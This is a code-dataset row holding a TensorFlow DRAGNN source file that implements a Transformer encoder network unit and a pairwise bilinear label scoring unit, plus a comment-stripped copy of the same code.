hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f73253edbec788340fa63d923f7d8dd39807876f | 24,052 | py | Python | research/syntaxnet/dragnn/python/transformer_units.py | vincentcheny/models | afb1a59fc1bc792ac72d1a3e22e2469020529788 | [
"Apache-2.0"
] | 1 | 2019-09-11T09:41:11.000Z | 2019-09-11T09:41:11.000Z | research/syntaxnet/dragnn/python/transformer_units.py | vincentcheny/models | afb1a59fc1bc792ac72d1a3e22e2469020529788 | [
"Apache-2.0"
] | null | null | null | research/syntaxnet/dragnn/python/transformer_units.py | vincentcheny/models | afb1a59fc1bc792ac72d1a3e22e2469020529788 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Network units implementing the Transformer network (Vaswani et al. 2017).
Heavily adapted from the tensor2tensor implementation of the Transformer,
described in detail here: https://arxiv.org/abs/1706.03762.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from dragnn.python import network_units
def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4):
  """Adds sinusoidal position information to every channel of a Tensor.
  Each channel is offset by a sinusoid whose wavelength is drawn from a
  geometric progression running from min_timescale to max_timescale, with
  channels / 2 distinct timescales.  For each timescale both
  sin(position / timescale) and cos(position / timescale) are emitted and
  concatenated along the channel axis.  Because sin(x+y) and cos(x+y) are
  linear in sin(x) and cos(x), attention layers can recover both absolute
  and relative positions from this signal; it should be added to precursors
  of both the query and memory inputs of attention.
  Args:
    x: a Tensor with shape [batch, length, channels]
    min_timescale: a float, shortest wavelength in the progression.
    max_timescale: a float, longest wavelength in the progression.
  Returns:
    a Tensor the same shape as x.
  """
  seq_len = tf.shape(x)[1]
  depth = tf.shape(x)[2]
  positions = tf.to_float(tf.range(seq_len))
  half_depth = depth // 2
  # Log-space step between consecutive timescales of the geometric sequence.
  log_step = (
      np.log(float(max_timescale) / float(min_timescale)) /
      (tf.to_float(half_depth) - 1))
  inv_scales = min_timescale * tf.exp(
      tf.to_float(tf.range(half_depth)) * -log_step)
  # [length, half_depth] grid of position / timescale angles.
  angles = tf.expand_dims(positions, 1) * tf.expand_dims(inv_scales, 0)
  timing = tf.concat([tf.sin(angles), tf.cos(angles)], axis=1)
  # Pad one zero channel when the channel count is odd.
  timing = tf.pad(timing, [[0, 0], [0, tf.mod(depth, 2)]])
  timing = tf.reshape(timing, [1, seq_len, depth])
  return x + timing
def split_last_dimension(x, n):
  """Reshapes x so its final dimension [m] becomes two dimensions [n, m/n].
  Args:
    x: a Tensor with shape [..., m]
    n: an integer.
  Returns:
    a Tensor with shape [..., n, m/n]
  """
  static_dims = x.get_shape().dims
  last_dim = static_dims[-1]
  # Preserve static shape information where known; m/n is None if m is unknown.
  target_static = static_dims[:-1] + [n] + [last_dim // n if last_dim else None]
  reshaped = tf.reshape(x, tf.concat([tf.shape(x)[:-1], [n, -1]], 0))
  reshaped.set_shape(target_static)
  return reshaped
def combine_last_two_dimensions(x):
  """Flattens the final two dimensions of x into a single dimension.
  Args:
    x: a Tensor with shape [..., a, b]
  Returns:
    a Tensor with shape [..., ab]
  """
  static_dims = x.get_shape().dims
  dim_a, dim_b = static_dims[-2:]
  # Static product is only known when both trailing dimensions are known.
  target_static = static_dims[:-2] + [dim_a * dim_b if dim_a and dim_b else None]
  flattened = tf.reshape(x, tf.concat([tf.shape(x)[:-2], [-1]], 0))
  flattened.set_shape(target_static)
  return flattened
def split_heads(x, num_heads):
  """Splits the channel dimension into num_heads separate attention heads.
  Args:
    x: a Tensor with shape [batch, length, channels]
    num_heads: an integer
  Returns:
    a Tensor with shape [batch, num_heads, length, channels / num_heads]
  """
  partitioned = split_last_dimension(x, num_heads)
  # Move the new heads axis ahead of the length axis.
  return tf.transpose(partitioned, [0, 2, 1, 3])
def combine_heads(x):
  """Merges attention heads back into the channel dimension (inverse of split_heads).
  Args:
    x: a Tensor with shape [batch, num_heads, length, channels / num_heads]
  Returns:
    a Tensor with shape [batch, length, channels]
  """
  # Restore [batch, length, heads, depth] ordering before flattening.
  reordered = tf.transpose(x, [0, 2, 1, 3])
  return combine_last_two_dimensions(reordered)
def compute_padding_mask(lengths):
  """Builds an additive attention mask that suppresses padding positions.
  Given the non-padded sequence lengths for the batch, returns a mask that,
  when added to attention logits before the softmax, drives attention on
  padding entries to ~0.
  Args:
    lengths: a Tensor containing the sequence length of each batch element
  Returns:
    A Tensor of shape [batch_size, 1, 1, max_len] with zeros in non-padding
    entries and -1e9 in padding entries.
  """
  flat_lengths = tf.reshape(lengths, [-1])
  valid = tf.sequence_mask(flat_lengths)
  # Invert the validity mask so padding positions become 1.0, then scale to a
  # large negative value for use as an additive pre-softmax penalty.
  padding_penalty = tf.to_float(tf.logical_not(valid)) * -1e9
  return tf.expand_dims(tf.expand_dims(padding_penalty, 1), 1)
def dot_product_attention(queries, keys, values, dropout_keep_rate, bias=None):
  """Computes dot-product attention over values.
  Args:
    queries: a Tensor with shape [batch, heads, seq_len, depth_keys]
    keys: a Tensor with shape [batch, heads, seq_len, depth_keys]
    values: a Tensor with shape [batch, heads, seq_len, depth_values]
    dropout_keep_rate: dropout proportion of units to keep
    bias: optional additive bias applied to the logits before the softmax,
      e.g. a padding mask; None to skip.
  Returns:
    A Tensor with shape [batch, heads, seq_len, depth_values].
  """
  # Pairwise query/key scores: [batch, num_heads, seq_len, seq_len].
  scores = tf.matmul(queries, keys, transpose_b=True)
  if bias is not None:
    scores = scores + bias
  attention = tf.nn.softmax(scores)
  # Randomly drop attention links within each head.
  attention = network_units.maybe_apply_dropout(attention, dropout_keep_rate,
                                                False)
  return tf.matmul(attention, values)
def residual(old_input, new_input, dropout_keep_rate, layer_norm):
  """Combines a layer's input and output with a residual connection.
  Computes layer_norm(old_input + dropout(new_input)), skipping the
  normalization step when layer_norm is None.
  Args:
    old_input: old float32 Tensor input to residual layer
    new_input: new float32 Tensor input to residual layer
    dropout_keep_rate: dropout proportion of units to keep
    layer_norm: network_units.LayerNorm to apply to residual output, or None
  Returns:
    float32 Tensor output of residual layer.
  """
  dropped = network_units.maybe_apply_dropout(new_input, dropout_keep_rate,
                                              False)
  combined = old_input + dropped
  if layer_norm:
    return layer_norm.normalize(combined)
  return combined
def mlp(component, input_tensor, dropout_keep_rate, depth):
  """Feeds the input through a stack of 1x1/1xk convolutional MLP layers.
  Every layer except the last is followed by a ReLU activation and dropout.
  Args:
    component: the DRAGNN Component containing parameters for the MLP
    input_tensor: the float32 Tensor input to the MLP.
    dropout_keep_rate: dropout proportion of units to keep
    depth: depth of the MLP.
  Returns:
    the float32 output Tensor
  """
  activations = input_tensor
  for layer_index in range(depth):
    layer_weights = component.get_variable('ff_weights_%d' % layer_index)
    activations = tf.nn.conv2d(activations,
                               layer_weights,
                               [1, 1, 1, 1],
                               padding='SAME')
    # The final layer is a pure linear projection: no ReLU, no dropout.
    if layer_index + 1 < depth:
      activations = tf.nn.relu(activations)
      activations = network_units.maybe_apply_dropout(activations,
                                                      dropout_keep_rate,
                                                      False)
  return activations
class TransformerEncoderNetwork(network_units.NetworkUnitInterface):
  """Implementation of the Transformer network encoder."""
  def __init__(self, component):
    """Initializes parameters for this Transformer unit.
    Args:
      component: parent ComponentBuilderBase object.
    Parameters used to construct the network:
      num_layers: number of transformer layers (attention + MLP)
      hidden_size: size of hidden layers in MLPs
      filter_size: filter width for each attention head
      num_heads: number of attention heads
      residual_dropout: dropout keep rate for residual layers
      attention_dropout: dropout keep rate for attention weights
      mlp_dropout: dropout keep rate for mlp layers
      initialization: initialization scheme to use for model parameters
      bias_init: initial value for bias parameters
      scale_attention: whether to scale attention parameters by filter_size^-0.5
      layer_norm_residuals: whether to perform layer normalization on residual
        layers
      timing_signal: whether to add a position-wise timing signal to the input
      kernel: kernel width in middle MLP layers
      mlp_layers: number of MLP layers. Must be >= 2.
    Raises:
      ValueError: if mlp_layers < 2.
    The input depth of the first layer is inferred from the total concatenated
    size of the input features, minus 1 to account for the sequence lengths.
    Hyperparameters used:
      dropout_rate: The probability that an input is not dropped. This is the
        default when the |dropout_keep_prob| parameter is unset.
    """
    super(TransformerEncoderNetwork, self).__init__(component)
    default_dropout_rate = component.master.hyperparams.dropout_rate
    # Network-unit parameters from the spec, with per-key fallback defaults.
    self._attrs = network_units.get_attrs_with_defaults(
        component.spec.network_unit.parameters, defaults={
            'num_layers': 4,
            'hidden_size': 256,
            'filter_size': 64,
            'num_heads': 8,
            'residual_drop': default_dropout_rate,
            'attention_drop': default_dropout_rate,
            'mlp_drop': default_dropout_rate,
            'initialization': 'xavier',
            'bias_init': 0.001,
            'scale_attention': True,
            'layer_norm_residuals': True,
            'timing_signal': True,
            'kernel': 1,
            'mlp_layers': 2})
    self._num_layers = self._attrs['num_layers']
    self._hidden_size = self._attrs['hidden_size']
    self._filter_size = self._attrs['filter_size']
    self._num_heads = self._attrs['num_heads']
    self._residual_dropout = self._attrs['residual_drop']
    self._attention_dropout = self._attrs['attention_drop']
    self._mlp_dropout = self._attrs['mlp_drop']
    self._initialization = self._attrs['initialization']
    self._bias_init = self._attrs['bias_init']
    self._scale_attn = self._attrs['scale_attention']
    self._layer_norm_res = self._attrs['layer_norm_residuals']
    self._timing_signal = self._attrs['timing_signal']
    self._kernel = self._attrs['kernel']
    self._mlp_depth = self._attrs['mlp_layers']
    if self._mlp_depth < 2:
      raise ValueError('TransformerEncoderNetwork needs mlp_layers >= 2')
    # Total projection depth across all attention heads.
    self._combined_filters = self._num_heads * self._filter_size
    self._weights = []
    self._biases = []
    self._layer_norms = {}
    # Hacky: one dimension comes from the lengths input; subtract it.
    self._concatenated_input_dim -= 1
    # Initial projection of inputs, this is mainly to project input down to the
    # right size for residual layers
    proj_shape = [1, 1, self._concatenated_input_dim, self._combined_filters]
    self._weights.append(
        network_units.add_var_initialized('init_proj', proj_shape,
                                          self._initialization))
    self._biases.append(tf.get_variable('init_bias',
                                        self._combined_filters,
                                        initializer=tf.constant_initializer(
                                            self._bias_init),
                                        dtype=tf.float32))
    # Per-layer parameters, each created under its own variable scope so that
    # create() can fetch them again with reuse=True.
    for i in range(self._num_layers):
      with tf.variable_scope('transform_%d' % i):
        # Attention weights: 3 * self.combined_filters = (q, k, v)
        # We assume that q, k and v all have the same dimension
        attn_shape = [1, 1, self._combined_filters, 3 * self._combined_filters]
        self._weights.append(
            network_units.add_var_initialized('attn_weights',
                                              attn_shape,
                                              self._initialization))
        # Attention final projection weights
        proj_shape = [1, 1, self._combined_filters, self._combined_filters]
        self._weights.append(
            network_units.add_var_initialized('proj_weights',
                                              proj_shape,
                                              self._initialization))
        # MLP weights
        with tf.variable_scope('mlp'):
          ff_shape = [1, 1, self._combined_filters, self._hidden_size]
          self._weights.append(
              network_units.add_var_initialized('ff_weights_0',
                                                ff_shape,
                                                self._initialization))
          # Middle layers use the configurable kernel width.
          ff_shape = [1, self._kernel, self._hidden_size, self._hidden_size]
          for j in range(1, self._mlp_depth - 1):
            self._weights.append(
                network_units.add_var_initialized('ff_weights_%d' % j,
                                                  ff_shape,
                                                  self._initialization))
          # Final layer projects back down to the combined filter depth.
          ff_shape = [1, 1, self._hidden_size, self._combined_filters]
          self._weights.append(
              network_units.add_var_initialized('ff_weights_%d' %
                                                (self._mlp_depth - 1),
                                                ff_shape,
                                                self._initialization))
        # Layer normalization for residual layers
        if self._layer_norm_res:
          attn_layer_norm = network_units.LayerNorm(component,
                                                    'attn_layer_norm_%d' % i,
                                                    self._combined_filters,
                                                    tf.float32)
          self._layer_norms['attn_layer_norm_%d' % i] = attn_layer_norm
          ff_layer_norm = network_units.LayerNorm(component,
                                                  'ff_layer_norm_%d' % i,
                                                  self._combined_filters,
                                                  tf.float32)
          self._layer_norms['ff_layer_norm_%d' % i] = ff_layer_norm
          # Layer norm parameters are not added to self._weights,
          # which means that they are not l2 regularized
          self._params.extend(attn_layer_norm.params + ff_layer_norm.params)
    self._params.extend(self._weights)
    self._params.extend(self._biases)
    self._regularized_weights.extend(self._weights)
    self._layers.append(
        network_units.Layer(component, name='transformer_output',
                            dim=self._combined_filters))
  def create(self,
             fixed_embeddings,
             linked_embeddings,
             context_tensor_arrays,
             attention_tensor,
             during_training,
             stride=None):
    """Requires |stride|; otherwise see base class."""
    del context_tensor_arrays, attention_tensor
    if stride is None:
      raise RuntimeError("TransformerEncoderNetwork needs 'stride' and must be "
                         "called in the bulk feature extractor component.")
    # Sequence lengths arrive as a linked feature; squeeze to a [batch] vector.
    lengths = network_units.lookup_named_tensor('lengths', linked_embeddings)
    lengths_s = tf.to_int32(tf.squeeze(lengths.tensor, [1]))
    num_steps = tf.reduce_max(lengths_s)
    in_tensor = network_units.lookup_named_tensor('features', linked_embeddings)
    input_tensor = tf.reshape(in_tensor.tensor, [stride, num_steps, -1])
    if self._timing_signal:
      input_tensor = add_timing_signal_1d(input_tensor)
    # Adds a dimension for conv2d
    input_tensor = tf.expand_dims(input_tensor, 1)
    # For masking padding in attention
    mask = compute_padding_mask(lengths_s)
    # Initial 1x1 convolution projects inputs to the residual width.
    conv = tf.nn.conv2d(input_tensor,
                        self._component.get_variable('init_proj'),
                        [1, 1, 1, 1], padding='SAME')
    conv = tf.nn.bias_add(conv, self._component.get_variable('init_bias'))
    # Re-enter each layer's scope (reuse=True) to fetch the variables that
    # __init__ created, then apply attention + MLP with residual connections.
    for i in range(self._num_layers):
      with tf.variable_scope('transform_%d' % i, reuse=True):
        attn_weights = self._component.get_variable('attn_weights')
        attn_combined = tf.nn.conv2d(conv,
                                     attn_weights,
                                     [1, 1, 1, 1],
                                     padding='SAME')
        attn_combined = tf.squeeze(attn_combined, 1)
        # Splits combined projection into queries, keys, and values
        queries, keys, values = tf.split(attn_combined,
                                         [self._combined_filters]*3,
                                         axis=2)
        # Splits each of queries, keys, values into attention heads
        queries = split_heads(queries, self._num_heads)
        keys = split_heads(keys, self._num_heads)
        values = split_heads(values, self._num_heads)
        if self._scale_attn:
          queries *= self._filter_size**-0.5
        # Performs dot product attention and concatenates the resulting heads
        attended = dot_product_attention(queries, keys, values,
                                         self._attention_dropout, mask)
        attended = combine_heads(attended)
        # Projects combined heads
        attended = tf.expand_dims(attended, 1)
        proj = tf.nn.conv2d(attended,
                            self._component.get_variable('proj_weights'),
                            [1, 1, 1, 1],
                            padding='SAME')
        # Residual connection between input and attended input
        attn_layer_norm_params = None
        if self._layer_norm_res:
          attn_layer_norm_params = self._layer_norms['attn_layer_norm_%d' % i]
        proj_res = residual(conv, proj, self._residual_dropout,
                            attn_layer_norm_params)
        # Feed forward
        with tf.variable_scope('mlp'):
          ff = mlp(self._component, proj_res, self._mlp_dropout,
                   self._mlp_depth)
        # Residual connection between attended input and feed forward layers
        ff_layer_norm_params = None
        if self._layer_norm_res:
          ff_layer_norm_params = self._layer_norms['ff_layer_norm_%d' % i]
        conv = residual(proj_res, ff, self._residual_dropout,
                        ff_layer_norm_params)
    # Flatten back to [batch * num_steps, combined_filters] for downstream use.
    return [tf.reshape(conv, [-1, self._combined_filters],
                       name='reshape_activations')]
class PairwiseBilinearLabelNetwork(network_units.NetworkUnitInterface):
  r"""Network unit that computes pairwise bilinear label scores.
  Given source and target representations for each token, this network unit
  computes bilinear scores for each label for each of the N^2 combinations of
  source and target tokens, rather than for only N already-computed
  source/target pairs (as is performed by the biaffine_units). The output is
  suitable as input to e.g. the heads_labels transition system.
  Specifically, a weights tensor W called `bilinear' is used to compute bilinear
  scores B for input tensors S and T:
  B_{bnml} = \sum_{i,j} S_{bni} W_{ilj} T{bmj}
  for batches b, steps n and m and labels l.
  Parameters:
    num_labels: The number of dependency labels, L.
  Features:
    sources: [B * N, S] matrix of batched activations for source tokens.
    targets: [B * N, T] matrix of batched activations for target tokens.
  Layers:
    bilinear_scores: [B * N, N * L] matrix where vector b*N*N*L+t contains
                     per-label scores for all N possible arcs from token t in
                     batch b.
  """
  def __init__(self, component):
    """Initializes the bilinear weight tensor and output layer."""
    super(PairwiseBilinearLabelNetwork, self).__init__(component)
    parameters = component.spec.network_unit.parameters
    self._num_labels = int(parameters['num_labels'])
    # Dimensions of the linked source/target token activations.
    self._source_dim = self._linked_feature_dims['sources']
    self._target_dim = self._linked_feature_dims['targets']
    self._weights = []
    self._weights.append(
        network_units.add_var_initialized('bilinear',
                                          [self._source_dim,
                                           self._num_labels,
                                           self._target_dim],
                                          'xavier'))
    self._params.extend(self._weights)
    self._regularized_weights.extend(self._weights)
    self._layers.append(network_units.Layer(component,
                                            name='bilinear_scores',
                                            dim=self._num_labels))
  def create(self,
             fixed_embeddings,
             linked_embeddings,
             context_tensor_arrays,
             attention_tensor,
             during_training,
             stride=None):
    """Requires |stride|; otherwise see base class."""
    del context_tensor_arrays, attention_tensor
    if stride is None:
      raise RuntimeError("PairwiseBilinearLabelNetwork needs 'stride' and must "
                         "be called in a bulk component.")
    sources = network_units.lookup_named_tensor('sources', linked_embeddings)
    sources_tensor = tf.reshape(sources.tensor, [stride, -1, self._source_dim])
    targets = network_units.lookup_named_tensor('targets', linked_embeddings)
    targets_tensor = tf.reshape(targets.tensor, [stride, -1, self._target_dim])
    # Dimensions: source_dim x num_labels x target_dim
    bilinear_params = self._component.get_variable('bilinear')
    # Ensures that num_steps is the same for both inputs
    num_steps = tf.shape(sources_tensor)[1]
    with tf.control_dependencies([tf.assert_equal(num_steps,
                                                  tf.shape(targets_tensor)[1],
                                                  name='num_steps_mismatch')]):
      # The bilinear form is computed as two batched matmuls around reshapes.
      # Dimensions:
      # (batch_size*num_steps x source_dim) *
      # (source_dim x num_labels*target_dim)
      # = (batch_size*num_steps x num_labels*target_dim)
      lin = tf.matmul(tf.reshape(sources_tensor, [-1, self._source_dim]),
                      tf.reshape(bilinear_params, [self._source_dim, -1]))
      # (batch_size x num_steps*num_labels x target_dim) *
      # (batch_size x num_steps x target_dim)^T
      # = (batch_size x num_steps*num_labels x num_steps)
      bilin = tf.matmul(
          tf.reshape(lin, [-1, num_steps*self._num_labels, self._target_dim]),
          targets_tensor, transpose_b=True)
    # (batch_size x num_steps*num_labels x num_steps) ->
    # (batch_size x num_steps x num_steps*num_labels)
    scores = tf.transpose(bilin, [0, 2, 1])
    return [tf.reshape(scores, [-1, num_steps*self._num_labels],
                       name='reshape_activations')]
| 41.11453 | 81 | 0.61866 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from dragnn.python import network_units
def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4):
length = tf.shape(x)[1]
channels = tf.shape(x)[2]
pos = tf.to_float(tf.range(length))
num_timescales = channels // 2
log_timescale_increment = (
np.log(float(max_timescale) / float(min_timescale)) /
(tf.to_float(num_timescales) - 1))
inv_timescales = min_timescale * tf.exp(
tf.to_float(tf.range(num_timescales)) * -log_timescale_increment)
scaled_time = tf.expand_dims(pos, 1) * tf.expand_dims(inv_timescales, 0)
signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)
signal = tf.pad(signal, [[0, 0], [0, tf.mod(channels, 2)]])
signal = tf.reshape(signal, [1, length, channels])
return x + signal
def split_last_dimension(x, n):
old_shape = x.get_shape().dims
last = old_shape[-1]
new_shape = old_shape[:-1] + [n] + [last // n if last else None]
ret = tf.reshape(x, tf.concat([tf.shape(x)[:-1], [n, -1]], 0))
ret.set_shape(new_shape)
return ret
def combine_last_two_dimensions(x):
old_shape = x.get_shape().dims
a, b = old_shape[-2:]
new_shape = old_shape[:-2] + [a * b if a and b else None]
ret = tf.reshape(x, tf.concat([tf.shape(x)[:-2], [-1]], 0))
ret.set_shape(new_shape)
return ret
def split_heads(x, num_heads):
return tf.transpose(split_last_dimension(x, num_heads), [0, 2, 1, 3])
def combine_heads(x):
return combine_last_two_dimensions(tf.transpose(x, [0, 2, 1, 3]))
def compute_padding_mask(lengths):
lengths = tf.reshape(lengths, [-1])
mask = tf.sequence_mask(lengths)
inv_mask = tf.to_float(tf.logical_not(mask))
mem_padding = inv_mask * -1e9
return tf.expand_dims(tf.expand_dims(mem_padding, 1), 1)
def dot_product_attention(queries, keys, values, dropout_keep_rate, bias=None):
logits = tf.matmul(queries, keys, transpose_b=True)
if bias is not None:
logits += bias
attn_weights = tf.nn.softmax(logits)
attn_weights = network_units.maybe_apply_dropout(attn_weights,
dropout_keep_rate,
False)
return tf.matmul(attn_weights, values)
def residual(old_input, new_input, dropout_keep_rate, layer_norm):
res_sum = old_input + network_units.maybe_apply_dropout(new_input,
dropout_keep_rate,
False)
return layer_norm.normalize(res_sum) if layer_norm else res_sum
def mlp(component, input_tensor, dropout_keep_rate, depth):
for i in range(depth):
ff_weights = component.get_variable('ff_weights_%d' % i)
input_tensor = tf.nn.conv2d(input_tensor,
ff_weights,
[1, 1, 1, 1],
padding='SAME')
if i < depth - 1:
input_tensor = tf.nn.relu(input_tensor)
input_tensor = network_units.maybe_apply_dropout(input_tensor,
dropout_keep_rate,
False)
return input_tensor
class TransformerEncoderNetwork(network_units.NetworkUnitInterface):
def __init__(self, component):
super(TransformerEncoderNetwork, self).__init__(component)
default_dropout_rate = component.master.hyperparams.dropout_rate
self._attrs = network_units.get_attrs_with_defaults(
component.spec.network_unit.parameters, defaults={
'num_layers': 4,
'hidden_size': 256,
'filter_size': 64,
'num_heads': 8,
'residual_drop': default_dropout_rate,
'attention_drop': default_dropout_rate,
'mlp_drop': default_dropout_rate,
'initialization': 'xavier',
'bias_init': 0.001,
'scale_attention': True,
'layer_norm_residuals': True,
'timing_signal': True,
'kernel': 1,
'mlp_layers': 2})
self._num_layers = self._attrs['num_layers']
self._hidden_size = self._attrs['hidden_size']
self._filter_size = self._attrs['filter_size']
self._num_heads = self._attrs['num_heads']
self._residual_dropout = self._attrs['residual_drop']
self._attention_dropout = self._attrs['attention_drop']
self._mlp_dropout = self._attrs['mlp_drop']
self._initialization = self._attrs['initialization']
self._bias_init = self._attrs['bias_init']
self._scale_attn = self._attrs['scale_attention']
self._layer_norm_res = self._attrs['layer_norm_residuals']
self._timing_signal = self._attrs['timing_signal']
self._kernel = self._attrs['kernel']
self._mlp_depth = self._attrs['mlp_layers']
if self._mlp_depth < 2:
raise ValueError('TransformerEncoderNetwork needs mlp_layers >= 2')
self._combined_filters = self._num_heads * self._filter_size
self._weights = []
self._biases = []
self._layer_norms = {}
self._concatenated_input_dim -= 1
proj_shape = [1, 1, self._concatenated_input_dim, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('init_proj', proj_shape,
self._initialization))
self._biases.append(tf.get_variable('init_bias',
self._combined_filters,
initializer=tf.constant_initializer(
self._bias_init),
dtype=tf.float32))
for i in range(self._num_layers):
with tf.variable_scope('transform_%d' % i):
attn_shape = [1, 1, self._combined_filters, 3 * self._combined_filters]
self._weights.append(
network_units.add_var_initialized('attn_weights',
attn_shape,
self._initialization))
proj_shape = [1, 1, self._combined_filters, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('proj_weights',
proj_shape,
self._initialization))
with tf.variable_scope('mlp'):
ff_shape = [1, 1, self._combined_filters, self._hidden_size]
self._weights.append(
network_units.add_var_initialized('ff_weights_0',
ff_shape,
self._initialization))
ff_shape = [1, self._kernel, self._hidden_size, self._hidden_size]
for j in range(1, self._mlp_depth - 1):
self._weights.append(
network_units.add_var_initialized('ff_weights_%d' % j,
ff_shape,
self._initialization))
ff_shape = [1, 1, self._hidden_size, self._combined_filters]
self._weights.append(
network_units.add_var_initialized('ff_weights_%d' %
(self._mlp_depth - 1),
ff_shape,
self._initialization))
if self._layer_norm_res:
attn_layer_norm = network_units.LayerNorm(component,
'attn_layer_norm_%d' % i,
self._combined_filters,
tf.float32)
self._layer_norms['attn_layer_norm_%d' % i] = attn_layer_norm
ff_layer_norm = network_units.LayerNorm(component,
'ff_layer_norm_%d' % i,
self._combined_filters,
tf.float32)
self._layer_norms['ff_layer_norm_%d' % i] = ff_layer_norm
self._params.extend(attn_layer_norm.params + ff_layer_norm.params)
self._params.extend(self._weights)
self._params.extend(self._biases)
self._regularized_weights.extend(self._weights)
self._layers.append(
network_units.Layer(component, name='transformer_output',
dim=self._combined_filters))
def create(self,
fixed_embeddings,
linked_embeddings,
context_tensor_arrays,
attention_tensor,
during_training,
stride=None):
del context_tensor_arrays, attention_tensor
if stride is None:
raise RuntimeError("TransformerEncoderNetwork needs 'stride' and must be "
"called in the bulk feature extractor component.")
lengths = network_units.lookup_named_tensor('lengths', linked_embeddings)
lengths_s = tf.to_int32(tf.squeeze(lengths.tensor, [1]))
num_steps = tf.reduce_max(lengths_s)
in_tensor = network_units.lookup_named_tensor('features', linked_embeddings)
input_tensor = tf.reshape(in_tensor.tensor, [stride, num_steps, -1])
if self._timing_signal:
input_tensor = add_timing_signal_1d(input_tensor)
input_tensor = tf.expand_dims(input_tensor, 1)
mask = compute_padding_mask(lengths_s)
conv = tf.nn.conv2d(input_tensor,
self._component.get_variable('init_proj'),
[1, 1, 1, 1], padding='SAME')
conv = tf.nn.bias_add(conv, self._component.get_variable('init_bias'))
for i in range(self._num_layers):
with tf.variable_scope('transform_%d' % i, reuse=True):
attn_weights = self._component.get_variable('attn_weights')
attn_combined = tf.nn.conv2d(conv,
attn_weights,
[1, 1, 1, 1],
padding='SAME')
attn_combined = tf.squeeze(attn_combined, 1)
queries, keys, values = tf.split(attn_combined,
[self._combined_filters]*3,
axis=2)
queries = split_heads(queries, self._num_heads)
keys = split_heads(keys, self._num_heads)
values = split_heads(values, self._num_heads)
if self._scale_attn:
queries *= self._filter_size**-0.5
attended = dot_product_attention(queries, keys, values,
self._attention_dropout, mask)
attended = combine_heads(attended)
attended = tf.expand_dims(attended, 1)
proj = tf.nn.conv2d(attended,
self._component.get_variable('proj_weights'),
[1, 1, 1, 1],
padding='SAME')
attn_layer_norm_params = None
if self._layer_norm_res:
attn_layer_norm_params = self._layer_norms['attn_layer_norm_%d' % i]
proj_res = residual(conv, proj, self._residual_dropout,
attn_layer_norm_params)
with tf.variable_scope('mlp'):
ff = mlp(self._component, proj_res, self._mlp_dropout,
self._mlp_depth)
ff_layer_norm_params = None
if self._layer_norm_res:
ff_layer_norm_params = self._layer_norms['ff_layer_norm_%d' % i]
conv = residual(proj_res, ff, self._residual_dropout,
ff_layer_norm_params)
return [tf.reshape(conv, [-1, self._combined_filters],
name='reshape_activations')]
class PairwiseBilinearLabelNetwork(network_units.NetworkUnitInterface):
def __init__(self, component):
super(PairwiseBilinearLabelNetwork, self).__init__(component)
parameters = component.spec.network_unit.parameters
self._num_labels = int(parameters['num_labels'])
self._source_dim = self._linked_feature_dims['sources']
self._target_dim = self._linked_feature_dims['targets']
self._weights = []
self._weights.append(
network_units.add_var_initialized('bilinear',
[self._source_dim,
self._num_labels,
self._target_dim],
'xavier'))
self._params.extend(self._weights)
self._regularized_weights.extend(self._weights)
self._layers.append(network_units.Layer(component,
name='bilinear_scores',
dim=self._num_labels))
def create(self,
fixed_embeddings,
linked_embeddings,
context_tensor_arrays,
attention_tensor,
during_training,
stride=None):
del context_tensor_arrays, attention_tensor
if stride is None:
raise RuntimeError("PairwiseBilinearLabelNetwork needs 'stride' and must "
"be called in a bulk component.")
sources = network_units.lookup_named_tensor('sources', linked_embeddings)
sources_tensor = tf.reshape(sources.tensor, [stride, -1, self._source_dim])
targets = network_units.lookup_named_tensor('targets', linked_embeddings)
targets_tensor = tf.reshape(targets.tensor, [stride, -1, self._target_dim])
bilinear_params = self._component.get_variable('bilinear')
num_steps = tf.shape(sources_tensor)[1]
with tf.control_dependencies([tf.assert_equal(num_steps,
tf.shape(targets_tensor)[1],
name='num_steps_mismatch')]):
lin = tf.matmul(tf.reshape(sources_tensor, [-1, self._source_dim]),
tf.reshape(bilinear_params, [self._source_dim, -1]))
bilin = tf.matmul(
tf.reshape(lin, [-1, num_steps*self._num_labels, self._target_dim]),
targets_tensor, transpose_b=True)
scores = tf.transpose(bilin, [0, 2, 1])
